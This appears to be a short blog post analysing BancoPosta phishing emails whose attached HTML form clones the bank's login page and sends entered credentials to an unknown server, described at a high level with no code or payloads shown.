[SPAM] Banco Posta online – Italy

Often the spam folder of my gmail account is very interesting. I’m not a bancoposte customer, but I receive 2/3 email per week where someone notify me that my back account will be locked unless I provide my credentials in the attached form.

spamposte

The attached form is nothing more and nothing less that an HTML file that clone the real web page form. The fake has the same javascript code in the head, point external javscript and CSS files to the reals resource on https://bancopostaonline.poste.it.

Of course, looking into the form, the post action result as the real danger.

bancoposte.postdata

All post data will be sent to an unknown server located in China.

Visiting the url (sending fake data) via post or get request, the page forward the client to poste.it with no referer.